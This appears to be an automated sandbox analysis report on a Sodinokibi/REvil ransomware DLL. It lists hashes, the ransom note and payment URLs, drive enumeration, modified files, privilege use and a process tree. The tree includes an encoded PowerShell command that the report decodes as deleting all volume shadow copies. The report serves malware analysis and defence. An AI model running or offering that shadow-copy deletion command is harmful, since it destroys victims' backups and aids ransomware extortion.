Analysis
max time kernel: 133s
max time network: 102s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 13/05/2024, 22:33

Static task: static1
Behavioral task: behavioral1
  Sample: 3cd7e62bc197926278810ea5f6adff19_JaffaCakes118.dll
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: 3cd7e62bc197926278810ea5f6adff19_JaffaCakes118.dll
  Resource: win10v2004-20240426-en

General
Target: 3cd7e62bc197926278810ea5f6adff19_JaffaCakes118.dll
Size: 166KB
MD5: 3cd7e62bc197926278810ea5f6adff19
SHA1: ad18b4f27039aa3b3ca59b7b6d8ea5cb309d78a7
SHA256: 2a28f11ca820bd0bde24d41cb5307c8f2fa70174536ac13a99923ba70015b36f
SHA512: 214852706e4bb89464a92625e3594b19afe4c99157d1706493e4114ac5510a64d3af7ff88f09273c67ad3d20f1ead61e8740acc4147432c64755e9eccbac7c71
SSDEEP: 3072:JLFrb30BRtBZZg+i2ayyYOCWGPyLydrkxMT3Q44CTrZmDa:NJ0BXScFyfC3Hd4ygmoD
Malware Config
Extracted
C:\Users\2zv742-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7F8F90C705CD611
http://decryptor.cc/A7F8F90C705CD611
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs, 25 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description              ioc     Process
File opened (read-only)  \??\R:  rundll32.exe
File opened (read-only)  \??\K:  rundll32.exe
File opened (read-only)  \??\O:  rundll32.exe
File opened (read-only)  \??\X:  rundll32.exe
File opened (read-only)  \??\J:  rundll32.exe
File opened (read-only)  \??\I:  rundll32.exe
File opened (read-only)  \??\P:  rundll32.exe
File opened (read-only)  \??\U:  rundll32.exe
File opened (read-only)  \??\Y:  rundll32.exe
File opened (read-only)  \??\E:  rundll32.exe
File opened (read-only)  \??\L:  rundll32.exe
File opened (read-only)  \??\S:  rundll32.exe
File opened (read-only)  \??\Z:  rundll32.exe
File opened (read-only)  \??\B:  rundll32.exe
File opened (read-only)  \??\A:  rundll32.exe
File opened (read-only)  \??\H:  rundll32.exe
File opened (read-only)  \??\M:  rundll32.exe
File opened (read-only)  \??\N:  rundll32.exe
File opened (read-only)  \??\V:  rundll32.exe
File opened (read-only)  \??\W:  rundll32.exe
File opened (read-only)  \??\D:  rundll32.exe
File opened (read-only)  \??\G:  rundll32.exe
File opened (read-only)  \??\T:  rundll32.exe
File opened (read-only)  \??\F:  rundll32.exe
File opened (read-only)  \??\Q:  rundll32.exe

Drops file in Program Files directory (14 IoCs)
description                   ioc                                               Process
File opened for modification  \??\c:\program files\TraceUndo.htm                rundll32.exe
File opened for modification  \??\c:\program files\UnpublishTrace.vsw           rundll32.exe
File created                  \??\c:\program files (x86)\2zv742-readme.txt      rundll32.exe
File opened for modification  \??\c:\program files\BackupUpdate.js              rundll32.exe
File opened for modification  \??\c:\program files\ReceiveSet.M2TS              rundll32.exe
File created                  \??\c:\program files\2zv742-readme.txt            rundll32.exe
File opened for modification  \??\c:\program files\RedoUse.gif                  rundll32.exe
File opened for modification  \??\c:\program files\SplitOptimize.3gp2           rundll32.exe
File opened for modification  \??\c:\program files\UpdatePing.i64               rundll32.exe
File opened for modification  \??\c:\program files\GetConvert.vb                rundll32.exe
File opened for modification  \??\c:\program files\LockGrant.mpg                rundll32.exe
File opened for modification  \??\c:\program files\LockRegister.asp             rundll32.exe
File opened for modification  \??\c:\program files\PushImport.clr               rundll32.exe
File opened for modification  \??\c:\program files\ShowCopy.inf                 rundll32.exe

Suspicious behavior: EnumeratesProcesses (4 IoCs)
pid   Process
880   rundll32.exe
880   rundll32.exe
1996  powershell.exe
1996  powershell.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
description                pid   Process
Token: SeDebugPrivilege    880   rundll32.exe
Token: SeDebugPrivilege    1996  powershell.exe
Token: SeBackupPrivilege   3924  vssvc.exe
Token: SeRestorePrivilege  3924  vssvc.exe
Token: SeAuditPrivilege    3924  vssvc.exe

Suspicious use of WriteProcessMemory (5 IoCs)
description                      pid   Process       procid_target
PID 1524 wrote to memory of 880  1524  rundll32.exe  83
PID 1524 wrote to memory of 880  1524  rundll32.exe  83
PID 1524 wrote to memory of 880  1524  rundll32.exe  83
PID 880 wrote to memory of 1996  880   rundll32.exe  91
PID 880 wrote to memory of 1996  880   rundll32.exe  91
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\3cd7e62bc197926278810ea5f6adff19_JaffaCakes118.dll,#1
  PID: 1524
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\3cd7e62bc197926278810ea5f6adff19_JaffaCakes118.dll,#1
    PID: 880
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is base64-encoded UTF-16LE; decoded here, it reads: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} – the shadow copy deletion that the "Uses Volume Shadow Copy service COM API" signature and the vssvc.exe activity below reflect.)
      PID: 1996
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 2496

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 3924
  - Suspicious use of AdjustPrivilegeToken
Downloads

Filesize: 6KB
MD5: b329be068ff2e87004dbe5507f336a87
SHA1: 02047e420b95870c1fff5a67df61e894fc5e3f36
SHA256: 001b0d09b98c4e44564765d98e54528b63ce510730f93c53400ac9e822ff55ff
SHA512: e5e2dd95b526313f385b9ae87fe3edc8c4781d54879d67976ab2c0c8ac711b70b7a22a147f27135d390a6a818565a1d48a018f0417f57d520d0aac2ef5b42c06

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82